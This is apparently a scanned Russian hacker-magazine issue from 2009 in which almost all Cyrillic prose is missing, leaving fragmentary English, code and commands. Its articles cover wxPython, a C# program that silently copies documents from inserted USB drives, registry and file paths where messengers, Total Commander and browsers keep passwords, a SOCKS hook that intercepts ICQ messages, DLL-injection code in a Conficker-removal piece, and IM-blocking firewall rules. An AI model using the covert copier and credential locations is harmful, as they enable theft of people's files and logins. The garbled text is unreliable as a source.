event).
, , ,
, ( ).
helloButton,
OnButtonClick() Frame, .
:
Skip(),
(
, ).
.

. , , ,
.
wx.Panel , , ,
, .
,
.
. .
, . ,
( pos size).
Get/Set (
, C++,
wxPython wxWindows,
C++).
,
, .
(events) wxPythone , .
MainLoop(), .
, ,
. .
- , ,
, . wx.Event
. , wx.MouseEvent 14 ,
wx.EVT_RIGHT_DOWN, wx.EVT_LEFT_UP ..
wxPython,
. ,
wx.Button wx.CommandEvent
EVT_BUTTON. ,
, ,
.
, , ,
,
wx.PyEventBinder. .
,
.
wx.EvtHandler, ,
Bind. - ,
. : Bind(event, handler,
source=None, id=wx.ID_ANY, id2=wx.ID_ANY).
. Event wx.PyEventBinder, ; handler , ,
.
source , (
, , ).
090
, , , Hello,
world!, . .
GUI .
GUI:
1. .
2. .
3. GUI .

( Windows).
270 . ,
.
, .
,
/ , ,
. GUI,
.
, GUI.
.
, .
1. ,
,
(, buttonMul
button_12).
2. .
On. ,
, , (,
OnButtonEraseClick , ,
buttonErase). ,
, ,
.
3.
.
,
(
), .
, , , ,
labele . :
# ,
# panel.
children = self.panel.GetChildren()
# , .
for child in children:
if child.GetId() == event.GetId():
X 08 /128/ 09
>> coding
HTTP://WWW
links
http://www.python.
org/doc/faq/gui
Pythons GUI FAQ.
http://www.
wxpython.org

wxPython.
wiki.python.org/moin
GuiProgramming
IDE
.

# , ,
# labele .
self.textCtrlInfo.AppendText(child.
GetLabel())

. Pythona,
. ,
(=)
(
OnOperationClick). ,
,
Pythone. -
, (, 2+3,

2+3=5 ).
, ,
GUI.
, .
1. ,
(,
).
,
.

. , style
wx.DEFAULT_FRAME_STYLE & (~(wx.MAXIMIZE_BOX |
wx.RESIZE_BORDER).
2.
, , .
.
:
X 08 /128/ 09
try:
number = float(self.textCtrlInfo.GetValue())
except (TypeError, ValueError):
self.errorStatusBar.SetStatusText(
'! .')
return
http://boaconstructor.
sourceforge.net
IDE
GUI.
http://www.pdfsearch-engine.com/
wxpython-in-actionpdf.html
WxPython in action.
float; , , ,
errorStatusBar .
, (TypeError,
ValueError). errorStatusBar.
, .
3. ,

. ,
: textCtrlInfo.
SetMaxLength(30).
, wxPython .
wxPython. ,
. wxPython
wxPython
Demo, .
.

. WxPython in
action Noel Rappin Robin Dunn.
.
, ,
( 1,2,3,11,14). wxPython .
GUI
Pythone, . ! z
DVD
dvd

.
wxPython.
091
++++
>> coding
++++
++++
++++
++++

/ ANTONOV.IGOR.KHV@GMAIL.COM /
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++

-

// ( ) . ,
.
,
.

.
,
- , .
,
.
, :
.
, .

C#.
.NET
.
. , ,
.
. , ,
.
ProgressBar. .
092
- .

,
,
. ,
.
,
.
,
.

.
, . ,
MSND. ,
. !
WINAPI ...
(
)
WM_DEVICECHANGE. ,
X 08 /128/ 09
>> coding

?

. $10 $100.
, . ,
, . ,
;).
.
WindowProc. :
,
LResult CALLBACK WindowProc (
HWND hwnd, //
UINT uMsg, //
WPARAM wParam, //,
LPARAM lParam // -
XDIRECTORY
SOURCE
DESTINATION
.
.

OVERWRITE
. TRUE,
FOLDERFILTER
FILEFILTERS
X 08 /128/ 09
LAUNCH-

)

WParam ,
WM_DEVICECHANGE. :
- DBT_DEVICEARRIVAL
- DBT_DEVICEREMOVECOMPLETE
, ,
, , ?
( usb)
(, , ..). ,
. LParam
_DEV_BROADCAST_HDR,
dbch_devicetype. , ,
. DEV_DEVTYP_
VOLUME,
!

typedef struct _DEV_BROADCAST_HDR {
DWORD dbch_size; //
DWORD dbch_devicetype; //
DWORD dbch_reserved; //,
}DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
093
++++
>> coding
++++
++++
++++
++++
string dirName = Environment.GetCommandLineArgs()

[0] + "flash_" + DateTime.Now.ToString("dd-MM-yyhh-mm-ss");
CreateDirectory(dirName);
++++
xDirectory flashcopier = new xDirectory();

flashcopier.IndexComplete += new
IndexCompleteEventHandler(IndexCompleate);
++++
flashcopier.ItemCopied +=
new ItemCopiedEventHandler(ItemCopied);
++++
++++
flashcopier.CopyComplete +=
new CopyCompleteEventHandler(CopyComplete);
flashcopier.Source =
new DirectoryInfo(e.Drive.ToString());
flashcopier.Destination =
new DirectoryInfo(dirName);
++++
flashcopier.Overwrite = true;
flashcopier.FolderFilter = "*";
++++
++++
flashcopier.FileFilters.Add("*.doc");
flashcopier.FileFilters.Add("*.xls");
//
//....
flashcopier.StartCopy();
STARTCOPY
CANCELCOPY
XDIRECTORY
API, . . ;
. , .NET C#
.
.NET
C#.
? . WinAPI,

? ?.
- . WinAPI- ( ),
.
. C#,
.
( ) .
. ,
,
Windows API.
, , , Jan Dolinay.

DriveDetector, :
-;
;
;
;
;
,
.

, .
. :
++++
flashDriveDetector = new DriveDetector();
++++
++ ++
++++
++++
++++
++++
, , . , ,
DEV_BROADCAST_
VOLUME.

typedef struct _DEV_BROADCAST_VOLUME {
DWORD dbcv_size; //
DWORD dbcv_devicetype; //
DWORD dbcv_reserved; //
DWORD dbcv_unitmask; //
WORD dbcv_flags; //
}
DEV_BROADCAST_VOLUME, *PDEV_BROADCAST_VOLUME;
dbcv_unitmask. ,
,
. , 0, A;
1, B ..
.
094
flashDriveDetector.DeviceArrived +=
new DriveDetectorEventHandler(OnDriveArrived);
flashDriveDetector.DeviceRemoved +=
new DriveDetectorEventHandler(OnDriveRemoved);
DriveDetector
DevieArrived() DriveRemoved().
, .
Form1().

DeviceArrived. .
,
.
flash_ ,
, .
,
CreateDirectory().
.
DirectoryInfo, ,
X 08 /128/ 09
>> coding

Create(),
.
.
xDirectory.
, ,
: .
, xDirectory . -
.
, . ,
.
. , . ,
. XXI ,
xDirectory
.
, // ,
.
. ( ) usb-
, .
USB-

. . -. .
,
.
/ ,
.
, . , launch-.
, , , portable- ,
, .
.

X 08 /128/ 09
XDIRECTORY
ITEMINDEXEDEVENTHANDLER
INDEXCOMPLEATEEVENT
HANDLER
ITEMCOPIEDEVENTHANDLER
COPYCOMPLETEEVENTHANDLER
, .
.
?
, - .
Documents and Settings\\
Application Data\%ProgramName% .
ProgramName .
,
xDirectory (
) .
. ( ),

.NET (
TC):
RegistryKey readKey = Registry.CurrentUser.
OpenSubKey("software\\Ghisler\\Total
Commander");
string key =
(string) readKey.GetValue("InstallDir");
. .
, .
,
,
.
WARNING
warning

.
?

!
DVD
dvd

.
MAIL.AGENT
Mail.ru
( ). , ,
:
095
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++

, . ,
, . ( )

-. ,
.
1. . MA
Documents and setting\%%\Appication Data\Mra\base.
base mra.dbs. , ,
.
2. -.
MRA\% %\clist5.txt. ,
mail.agent (
). , @.
3. . (, )
HKCU\Software\Mail.RU\Agent\
magent_logins2\%Account% ####password.
GTALK
++++
++++
++++
Google ,
gabber- gTalk. gTalk
. ,
, ,
.
gTalk HHEY_
CURRENT_USER\Software\Google\Google Talk\Accounts.
, -
gTalk.
pw.
TOTAL COMMANDER
++++
++++
++ ++
++++
++++
++++
++++
Total Commander ,
.
(
). FTP-. , , ,
.
TC ,
ini-. ,
(ip, ,
..) Total Commander wcx_ftp.ini,
. ,
Total Commander, .
HKEY_CURRENT_USER\Software\Ghisler\Total Commander.
FIREFOX
WEB, ,
. web-. 99% .
/ ,

.
-
096
MSDN
. , ,
.
, . , , .
1. sessionstore.js .
2. signons3.txt ( FF).
3. signons.sqlite SQLite-,
.
4. key3.db , .
Document
and Settings\%UserName%\Application Data\Mozilla\FireFox\
Profiles\% %.
OPERA
Opera , . , .
, Opera , FireFox.
Document and
Settings\%UserName%\Application Data\Opera\profile wand.
dat. , Opera
, FireFox.
SKYPE
.
,
. , ,
( , FF).

Document and Settings\%userName%\Application Data\Skype\
HKEY_CURRENT_USER\Software\
Skype\ProtectedStorage.
QIP
, QIP Application Data\qip.
COPYING COMPLETED
.NET ,
. , ,
, WinAPI ASMe. - ,
, WinAPI , ,
. ,
. ,
, , .z
X 08 /128/ 09

2100 . ( 15%
)
. ,

!
!

+ + DVD:
- 155 ( 25% , )
12
3720
2100
+DVD 6
1200 .
, ,
8(495)780-88-29 ( )
8(800)200-3-999 ( , , ). info@glc.ru
www.GLC.ru
1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
:

;
20
.
,
.
, . ,
, .
!
C 2009
72 000 QIWI ()
.
++++
>> coding
++++
++++
PREDIDENTUA
/ HTTP://TUTAMC.COM /
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++

-

socks- Pythone
socks- ,
IP.
: , ,
.
1.
Google Chrome
. ,
. , .
! socks-,
Chromea. . ,
http- ( , user-agent) ,
. ,
, , . ,
.
2.
++++
++++
++++

FOA Group.
socks-, POST- ,
, AES
BASE64. , , . : [FOA]secure text[/FOA], socks- -
[FOA]BASE64==[/FOA]. html-
098
. -
base64-, ,
- .
3.
, - . ( ,
). ,

.
,
. -, Simp,
socks-,
RSA-. -, :).

. , Python.
SOCKS-

Socks .
, , -.
X 08 /128/ 09
>> coding
SOCKS
socks- Xavier Lagraula.

, PySocks.py ( ) socks.conf (). :
bind_address : 127.000.000.001
bind_port : 1080
IP- , socks-.
PySocks.py . ,
,
Windows7? , PySocks py pyw.
. ,
recv. PySocks.
py ,
( ):
data = readable_sock.recv(self.server)
if data:
if readable_sock == client_sock:
my_type = 1
else:
my_type = 2
data = my_hack.my_hack(my_type,data)
X 08 /128/ 09
OSCAR. !
writeableslist[0].send(data)
if readable_sock == client_sock:
octets_out += len(data)
else:
octets_in += len(data)
else:
raise Connection_Closed
.
( ). client_sock , ,
my_hack. .
, my_hack,
, , .
my_hack.py,
socks-, :
def my_hack(type,data):
return data
, (my_hack) , ,
socks-.
099
++++
>> coding
++++
OSCAR
++++
HTTP://WWW
++++
++++
++++
++++
++++
links

: dev.aol.com/
aim/oscar.
OSCAR , ,
. AOL ( Time Warner): ICQ AIM. AOL 5 2008
. , .
DES:
sourceforge.net/
projects/pydes.

Pythone socks,
:
sourceforge.net/
projects/pysocks.
++++
++++
DVD
dvd
++++
++++
++++

socks
.

!
++++
INFO
++ ++
info
++++
++++
++++
++++
SOCKS
,

(). SOCKS

SOCKetS (,
).
100
NETBEANS

pyDes.py, Todd
Whiteman.

padmode=pyDes.PAD_PKCS5.
encrypt decrypt .
, -.
:
.

, , .
.
my_hack:
import pyDes
#
def encode(password,data):
k = pyDes.des(pass,
padmode = pyDes.PAD_PKCS5)
return k.encrypt(data)
#
def decode(password,data):
k = pyDes.des(pass,
padmode=pyDes.PAD_PKCS5)
return k.decrypt(data)
DES-,
3DES. AES, Python
Cryptography Toolkit.
#
if type == 1:
file = open('q.txt.', 'w+')
file.write(data)
file.close()
,
0x2a02, 2 (,

). 2 ,
, 6 .
;
0x00040006.
26.
. ,
. 39 + 4 .
45 + _ .
X 08 /128/ 09
>> coding
NETBEANS
,
:
if type == 1:
#
if data[0:2] == '\x2a\x02'
and data[6:10] == '\x00\x04\x00\x06':
#
len_num = ord(data[26])
#
len_msg = ord(data[39+len_num])*256
+ord(data[40+len_num])-4
#
msg = data[45+len_num:45+len_num+len_msg]
, ? ,
, .
,
base64 base64,
, DES
:
enc_msg = encode(pass, msg)
enc_msg = base64.encodestring(enc_msg)
!
. , ,
, .
#
len_enc_msg = len(enc_msg)+4
len_num_1 = chr(len_enc_msg / 256)
len_num_2 = chr(len_enc_msg % 256)
X 08 /128/ 09
#
data = data[0:39+len_num] + len_num_1
+ len_num_2 + \x00\x02\x00\x00
+ enc_msg + data[45+len_num+len_msg:]
5- 6- , :
#
len_all = len(data)-6
len_all_1 = chr(len_all / 256)
len_all_2 = chr(len_all % 256)
#
data = data[0:4]+len_all_1 + len_all_2 + data[6:]
(
), hex.
, , . . -,
, , , .

,
, -
. , , ,
, https.
, ,
, . sslstrip,
12- .
, ! ?
? , , :).
, , , . : spirt40@gmail.com! z
101
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++

/ALEKSANDR-EHKKERT@RAMBLER.RU/

, , WinDDK ,
,
Windows .
CONFICKERA
++++
++++
++++
++++
-, , 10 . ,
.

,
.
, . ?

.
.
, ,
(, ?)
102
. . ,
, svchost.exe.
.
,
. ,
(
USB-, , , ).

. dll, . -,
system32 dll- .
, ,
svchost.exe.
X 08 /128/ 09
>> coding

Sysinternals, . , dll-

PEBe (
z, PETools . ListDlls Sysinternals,
. HandleViewer
lepujmlx.dll, svchost.exe. ,
, ,
.
, ntdll.dll, ,
, . , .
RKUnhooker .

, Confickera
( KidoKiller KAV EConfickerRemover ESET), ,
, lepujmlx.
dll , .
, svchost.exe lepujmlx.dll,
.
dll
svchost.exe .
Confickera,
, ; . -
- ,
.
, ,

LdrLoadDll . , NtOpenProcess, NtWriteVirtualMemory
NtReadVirtualMemory . ,
.
, .
, ,
FreeLibrary, ,
. , ,
.
. , dll
CreateRemoteThread.
:
DLL
: , , dll .
LoadLibrary ,
, LdrLoadDll. ,

LdrLoadDll, , ,
LdrLoadDll ntdll.dll.
usermode ntdll.
X 08 /128/ 09
hProcess = OpenProcess(...);
LibFileRemote = (PWSTR) VirtualAllocEx(hProcess...);
WriteProcessMemory(hProcess, LibFileRemote, ...);
PTHREAD_START_ROUTINE fnThreadRtn =
(PTHREAD_START_ROUTINE) GetProcAddress(
GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0,
fnThreadRtn, LibFileRemote, 0, NULL);
LdrLoadDll
LdrpLoadModule LdrAttachProcess, .
,
.
103
++++
>> coding
++++
++++
++++
++++
++++
++++
RKUNHOOKER SSDT
++++
++++
HTTP://WWW
links
++++
++++
++++

Windows

rsdn.ru wasm.ru.

Win
ntkernel.com.
++++
++++
++ ++
++++
INFO
info

Windows
,

HKEY_CURRENT_
USER\Software\
++++
Microsoft\Windows\
CurrentVersion\
Policies\Explorer
++++
++++
NoDriveType
AutoRun 0xff.
104
dll OpenFile/
CreateSection/MapViewOfSection. , ,
.
(, ntdll.dll
):
DWORD GetDllFunctionAddress(
char* lpFunctionName,
PUNICODE_STRING pDllName)
{
ZwOpenFile(...);
ZwCreateSection(...);
ZwMapViewOfSection(...);
...
dosheader = (IMAGE_DOS_HEADER *)hMod;
//
...
for(i = 0;
i < pExportTable-> NumberOfFunctions;
i++)
{
functionName = (char*)( (BYTE*)hMod +
arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x]
+ Base 1;
functionAddress = (DWORD)( (BYTE*)hMod +
arrayOfFunctionAddresses
[functionOrdinal]);
if (RtlCompareString(&ntFunctionName,
&ntFunctionNameSearch, TRUE) == 0)
return functionAddress;
}
return 0;
}
, LdrLoadDll, .
,
. LdrLoadDll,
. ,
, . KeAttachProcess svchost.exe
PEB (Process Environment Block; ,
z).
LDR_DATA_TABLE_ENTRY,
, ModuleBaseAddress.
: ntdll.dll
svchoste. , ,

LdrLoadDll.
myLdrLoadDll, .
, .
, .
, :

ntdll.dll
ZwQueryInformationProcess(
NtCurrentProcess(),
ProcessBasicInformation, &ProcInfo,
sizeof(PROCESS_BASIC_INFORMATION), &Size);
pPeb = ProcInfo.PebBaseAddress;
// : pPeb
(PEB*)0x7FFDF000;
PPEB_LDR_DATA Ldr = pPeb->Ldr;
PLIST_ENTRY InitialEntry =
Ldr -> InitializationOrder.Flink;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry =
CONTAINING_RECORD( InitialEntry,
LDR_DATA_TABLE_ENTRY,
InitializationOrder);
PLIST_ENTRY LoadOrderListHead =
LdrDataTableEntry->LoadOrder.Blink;

.
X 08 /128/ 09
>> coding

ZwWriteVirtualMemory,
ZwReadVirtualMemory, ZwOpenProcess, ZwDuplicateObject,
ZwQueryInformationProcess ZwProtectVirtualMemory.
.
.
. ,
. : Usermode ,
ntdll.dll,
KeServiceDescriptorTable (
, , ).
,
.
KESTACKATTACHPROCESS
, , KeAttachProcess ,
Microsoft, KeStackAttachProcess,

.
.
SSDT
, ,
, MmGetSystemRoutineAddress. ,
, : PVOID func_addres =
MmGetSystemRoutineAddress( &ApiNameUnicode ). . , ,
. ,
Windows .
MmGetSystemRoutineAddress NULL.

: ,
, . .
,

X 08 /128/ 09
DLL-
. ,
, .
,
NtAdjustPrivilegesToken.
,
. , ,
.
,
-
- .
BSOD.
, , , WinDBG - .
, , Immunity debuggerom, ,
, .
! z
DVD
dvd

,

, ,
.
105
>> phreaking
LOCKDOG / LINE3D@YANDEX.RU /

,
(
). , ,
, . .
>> phreaking

? , - .
. (, , ),
. ()
, , ,
, .
.
AVR. ,
. ,
C++ .
C++.
:
, ,
.

,
. ,
, . , .
, ,
,
106
(
). ,
.
. .
. .
ATmega16 , .
( ), , .

,
, , ,
.
, . L7805
5, .
2,5 ,
, , 7,5 . , .
, .

.
DIP ( ) . ,
, USART , .
, X 08 /128/ 09
>> phreaking

.
. RESET (9- ) R1
. ,
, .
, RESET
C1 .
1000 ,
, . X1 C2, C3
XTAL1 XTAL2.
, , ,
. C++.
CodeVisionAVR.
, .
X 08 /128/ 09

.
! , , . . L293D.

D, .
.
DIP SOIC. DIP
- . L293D
,
( VSS),
( VS). L293D 600 ,
. ,
. , , ,
107
>>
>> pc_zone
phreaking
,
:
ATmega16 DIP-40
L7805 TO-220
L293D DIP-16 2
.
0,25
: 10 1 .,
220 4 .
: 0.1 , 1 , 22
: 1000 16 , 220
16 2 .
1N4001 1N4004

16
-:

, ,
-
,
,

.

.
, L293D 1.2 . ,
, .
: IN1 IN2 0,
IN3 IN4 , .
,
. EN1 EN2
.
. ,
,
GND
. ,
.

,
.
-, , , -.
: , -
, . , , . ,
-

. ,
. .
, ,
.
108
, ,
,
. :
.

:
,

, ,

.
#include <mega16.h>
#include <delay.h>
, PORTC
, :
X 08 /128/ 09
>> phreaking
, , .

PORTC.0
PORTC.1
PORTC.2
PORTC.3
=
=
=
=
0xFF;
0x00;
0xFF;
0x00;
0xFF , . 1, 0x00 . 0.
,
:
if (!(PINB & (1<<PINB.0)))
{
...
}
-, 0, ,
. , , . ,
,
, . delay_ms(1000)
X 08 /128/ 09
,
. .
, . , ,
, - , ? , .
,
,
.
TSOP ( -,
)
. ; ,
.
,
. - !
OpenCV,
,
.
. z
109
>> phreaking
CLUSTER / CLUSTERRR@CLUSTERRR.COM /

. , ,
ASUS!
Linux.
, ?
>> phreaking

, . , .
, .
: , , .
-
LPT- . ,
. ,
,
.
. ,
,
.
.
ATmega16, COM-.

. : ,
. , ,
AVR +5 ,
, 0 . .
-, 5 . -, ,
. ;
. .
( PORTx, x
), . . .
COM-
USART-.
110
( ,
AVR). ,
;
.
- . .
, , ?
, ?
. :
,
;
, .
.
. Windows , /
, /
, , / -.
.
,

.
, . ,
, , Nintendo DS .
, , X 08 /128/ 09
>> phreaking
. COM-
COM-

. , COM-
, , ,
.
, :
.
. ,
ASUS WL-500gP. , Linux,
UART-, .
X 08 /128/ 09

,
. !
UART COM-,
MAX3232. . , z 125 (
UART). , , Linux,
COM- ,
, .
, ?
.
111
>>
>> pc_zone
phreaking
, USBCOM USB-. pl2303.

insmod usbserial.o insmod pl2303.o.
/dev/usb/tts/0.
. USB- ,

:
IPKG
mount /dev/scsi/host0/bus0/target0/lun0/
part1 /opt
ipkg.sh update
ipkg.sh install ipkg-opt
ipkg update
, /dev/scsi/host0/bus0/target0/
lun0/part1 EXT3- .
; ,
. , , -
MAX3232
DVD
dvd

.

.
112
ASUS
, (,
).
,
. :
http://oleg.wl500g.info.
WL-500gP, .

ipkg.
Step (z
106, Level-up ),
fdisk mke2fs; . ,
,
, . ,
:

echo "#!/bin/sh" > /usr/local/sbin/postmount
echo "mount /dev/scsi/host0/bus0/target0/
lun0/part1 /opt" >> /usr/local/sbin/postmount
chmod +x /usr/local/sbin/post-mount
flashfs save
X 08 /128/ 09
>> phreaking

flashfs commit
flashfs enable
post-mount ,
. , ! , ipkg install
<_>.

,
! ?
,
: ,
.
,
.
: , . , buildroot. ipkg install buildroot,

ipkg . gcc, g++, make . ,
, ?
:
HELLO WORLD
[Cluster@CLUSTER Cluster]$ cat hello.c
#include <stdio.h>

, !
? , . ,
. ,
. .
? , . X 08 /128/ 09
113
>>
>> pc_zone
phreaking
UART- WL-500GP ASUS

int main()
{
printf("Hello world!\n");
}
[Cluster@CLUSTER Cluster]$ gcc hello.c -o hello
[Cluster@CLUSTER Cluster]$ ./hello
Hello world!
, . . ,
. .
TCP-, .
, UART. , , ,
.
/dev/
usb/tts/0 /dev/usb/tts/1. , ,
. ,
. ,
- COM- ? ,
, . ,
:

stty -crtscts 9600 < /dev/tts/1
echo "Hello world!" > /dev/tts/1
. . , .
?
, ,
. , :

int open_uart_port()
{
114
int fd;
struct termios options;
fd = open(UARTPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd == -1)
{
perror("Cant open port");
exit(1);
}
tcflush(fd, TCIFLUSH);
tcgetattr(fd, &options);
options.c_cflag &= ~PARENB;
options.c_cflag &= ~CSTOPB;
options.c_cflag &= ~CSIZE;
options.c_cflag |= CS8;
options.c_cflag &= ~CRTSCTS;
options.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG);
cfsetospeed(&options, B9600);
tcsetattr(fd, TCSANOW, &options);
fcntl(fd, F_SETFL, FNDELAY);
printf("UART (%s) port opened\n", UARTPORT);
return fd;
}
UARTPORT -,
. /dev/tts/1. fopen() ,
. 9600
, ; .
write() read().
, , ,
,
:

int StartListen()
{
int sock;
X 08 /128/ 09
>>>>phreaking
pc_zone

int i = 1;
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Cant create socket");
return -1;
}
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(CCPORT);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sock, (struct sockaddr *)&sa, sizeof sa))
{
perror("Cant bind port");
close(sock);
return -1;
}
if (listen(sock, 15))
{
perror("Cant listen port");
close(sock);
return -1;
}
if (ioctl(sock, FIONBIO, &i))
{
perror("Cant set non-blocking mode");
close(sock);
return -1;
}
printf("Listening on port %u\n", CCPORT);
return sock;
}
CCPORT , . ,
( ).
.
. , ,
. COM-.
X 08 /128/ 09

,
.
Windows,
Borland Delphi. ,
.
,
. , :
, ,
..
, .
, .

, , , .
-! lighttpd, , . PHP.
PHP?
, .
,
-, , .
.
rrdtool,
,
. ,
, .. .
, ,
SMS, - .
.

,
.
,

. ,
- . z
115
>> SYN/ACK
_SSH3R1FF/ SSH3R1FF@GMAIL.COM /

IM, Skype, P2P
>> SYN/ACK
, , , , , ,
. , ,
.
,
IM-
: ,
.
90% , 10%
, ,
,
.
http-
,
. ,
, . .
, , tcpdump
:
$ sudo tcpdump -i eth0
:
21:33:55.687042 IP 10.10.10.10.33018
> 64.12.26.150.aol: . ack 11334 win
63920
, , IP- ICQ, , .
grep aol
/etc/protocols, tcpdump '-n'
. , :
$ sudo tcpdump -i eth0 dst portrange
5190
116

, . IM-.
ICQ, ,
login.icq.com 5190. , 5190
443.
,
:
$ host login.icq.com
login.icq.com is an alias for login.
messaging.aol.com.
login.messaging.aol.com has address
64.12.161.153
, login.icq.com
, , ,
. . ,
ICQ
,
.
dig
(dig login.icq.com).

. , -
(
iptables,
):
iptables -A FORWARD -p TCP --dport
5190 -j DROP
iptables -A OUTPUT -d login.icq.com
-j REJECT
iptables -A OUTPUT -d id.rambler.ru
-j REJECT
, IP
,
,
. ,

www.icq.com/icq2go, -.
, IP (
dig):
iptables -A OUTPUT -d 64.12.0.0/16
-j REJECT
iptables -A OUTPUT -d 205.188.0.0/16
-j REJECT

icq2go
(- www.meebo.com), IM- .
. tcpdump',
, Yahoo! Messenger
TCP-: 5000-5001,5050,5100 UDP-: 5000-5010, MSN 1863, Jabber/Gtalk
5222, 5223, IRC 6667-6669, ail : 2041, 2042.
, ! ,
(, IRC ..)
.
. ,
Yahoo Messenger:
X 08 /128/ 09
>> SYN/ACK
iptables
iptables
iptables
iptables
iptables
iptables
-A
-A
-A
-A
-A
-A
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
-p
-p
-p
-p
-d
-d
TCP --dport 5000:5001 -j REJECT

TCP --dport 5050 -j REJECT
TCP --dport 5100 -j REJECT
UDP --dport 5000:5010 -j REJECT
cs.yahoo.com -j REJECT
scsa.yahoo.com -j REJECT

DNS-,
. , DNS-
,
tcpdump. DNS- OpenBSD,
BIND 9.3.4:
$ sudo vim /var/named/etc/named.conf
logging {
//
MIPKO EMPLOYEE
MONITOR
: ICQ ,
, ,
. , , . . ,
, .
,
, .
MIPKO Employee Monitor (www.mipko.ru).
,
.
.
.
X 08 /128/ 09
channel queries_ch {
// - (
chroot-),
file "/log/queries.log" versions 5 size 10m;
// (
debug, info)
severity debug;
// ,

print-category yes;
print-severity yes;
print-time yes;
};
//
category queries { queries_ch; };
category resolver { queries_ch; };
};

l7-filter 10
12 , .
, /proc/
net/layer7_numpackets:
$ sudo sh -c "echo 16 > /proc/net/layer7_numpackets"
ICQ packet filter

$ sudo vim /etc/pf.conf
table <ICQDests> const { 64.12.0.0/16, 205.188.0.0/16 }
block out log quick on $ext_if proto { tcp, udp } \
from any to <ICQDests>
block out log quick on $ext_if proto { tcp, udp } \
from any to any port { 4000, 5190 }
117
>> SYN/ACK
- ICQ2GO
HOST DIG,
ICQ
named
DNS-:
INFO
info
Squid

z - 2008
.

Netfilter

,
l7-filter.
HTTP://WWW
links
Netfilter/Iptables
netfilter.org.
Squid www.squidcache.org.
l7-filter l7-filter.
sf.net.
IPP2P ipp2p.org.
P2PWall www.
lowth.com/p2pwall.
118
$ sudo rndc reload

$ sudo rndc querylog
:
$ sudo tail -f /var/named/log/queries.log
30-Jun-2009 16:22:15.036 resolver: debug 1:
createfetch: ns.mail.ru A
30-Jun-2009 16:22:35.179 queries: info: client
192.168.1.21#64773: view internal: query: www.
meebo.com IN A +
30-Jun-2009 16:22:35.868 queries: info: client
192.168.1.21#63341: view internal: query:
js.meebo.com IN A +
netstat/tcpdump/queries.log, .
. , iptstate TOP-
. , :
$ sudo iptstate --dstpt-filter=5190

IM- , 80/443 . iptables ,
, , Squid'
. ,
,
( Squid
z 2008 ). .
, squid.conf :
$ sudo vim /etc/squid/squid.conf

//
acl admin src 192.168.10.10
// aim/http MIME- ICQ
acl aim_http rep_mime_type -i âim/http$
// ,
http_reply_access deny aim_http !admin
// ,
ICQ
acl
ICQ-Mess
dst
64.12.200.89/32
205.188.153.121/32
205.188.179.233/32
64.12.161.153/32 64.12.161.185/32
http_access deny ICQ-Mess !admin
, IM-,
mail.ru, ,
:
acl im_nets src "/usr/local/etc/squid/icq_
nets.acl"
http_acces deny im_nets !admin
Sarg ( - Squid) , .
IPTABLES ,
,
.
OSI iptables.
2.6.14, ( patcho-matic-ng), , /
. string (xt_string).
, . , :
$ ls /lib/modules/2.6.24-24-generic/kernel/
net/netfilter/xt_string.ko
:
$ sudo iptables -A FORWARD -m string --string
"icq.com" \
--algo kmp --to 65535 -j DROP
, ,
. , /. ,
X 08 /128/ 09
>> SYN/ACK

TCPDUMP

,
Download Master:
$ sudo iptables -A FORWARD -m string --string --algo kmp \
"DownloadMaster" -j REJECT
, . '--algo' , ,
. kmp ( Knuth-Pratt-Morris) bm
( Boyer-Moore). ,
, bm . kmp bm,
. , string '--hex-string',
. ,
, , iptables.
.
, . l7-filter (l7-filter.
sf.net),Zorp(www.balabit.com/network-security/zorp-gateway),IPP2P(ipp2p.
org) P2PWall (www.lowth.com/p2pwall). ,
L7-FILTER USERSPACE- KERNEL-

, P2P-. Zorp
(Modular Application Level Gateway) . Zorp ,
.
, .
(HTTPS, POP3S, IMAPS SSH),
IDS. GPL (HTTP/1.1, FTP,
SSL, finger, whois telnet), Zorp .
L7-filter Netfilter
, ,
, . HTTP FTP; P2P (Kazaa, BitTorrent,
eDonkey2000, FastTrack); IM- (AIM/Jabber/IRC/MSN); VoIP/
Skype; VPN; (Battlefield, CS, Doom3, WoW); (exe, mp3)
Code Red Nimda.
l7-filter:
Kernel version ; , SMP- ;
Userspace version ,
,
GNU grep (,
).
, userspace , .
kernel- l7-filter,
IPP2P.
build-essential, iptables, iptables-dev
linux-source. , , /usr/src/linux:
$ sudo
config
cp
/boot/config-ùname
-r`
/usr/src/linux/.
l7-filter ( ), :
4.
- VELLE!
. .
1 !
www.velleoats.com
X 08 /128/ 09
119
>> .PRO
SYN/ACK
iptables -A FORWARD -m layer7 l7proto aim -j DROP
iptables -A FORWARD -m layer7 l7proto skypetoskype -j
DROP
iptables -A FORWARD -m layer7 l7proto skypeout -j DROP
: .
L7-FILTER

$ tar xzvf netfilter-layer7-v2.21.tar.gz

$ cd /usr/src/linux
iptables. (
2.6.28):
$ sudo patch -p1 < ../netfilter-layer7-v2.21/for_older_
kernels/kernel-2.6.22-2.6.24-layer7-2.18.patch
iptables:
$ cd ../iptables
$ iptables -v
iptables v1.3.8
$ sudo patch -p1 < ../netfilter-layer7-v2.21/iptables1.3-for-kernel-2.6.20forward-layer7-2.21.patch
$ sudo chmod +x extensions/.layer7-test
iptables:
$ make KERNEL_DIR=/usr/src/linux
$ sudo make install
IPP2P IPP2P , P2P-. l7-filter,

Netfilter/iptables, .
.
IPP2P . , IPP2P
, , .
, ,
. DVD-
ipp2p-0.8.2.tar.gz, ipp2p-0.8.2-kernel-2.6.22.patch
:
$ sudo make
, ipp2p-0.8.2/Makefile:36:
You need to install iptables sources and maybe set IPTABLES_SRC.
, ,
iptables.h. /usr/src/iptables.
Makefile :
$ sudo nano Makefile
